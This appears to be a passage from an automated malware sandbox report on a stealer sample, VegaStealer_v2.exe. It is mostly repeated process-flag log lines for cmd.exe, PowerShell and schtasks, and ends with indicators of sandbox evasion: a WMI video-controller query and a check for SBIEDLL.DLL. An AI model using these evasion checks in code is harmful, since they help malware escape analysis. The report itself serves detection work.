                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: SBIEDLL.DLL
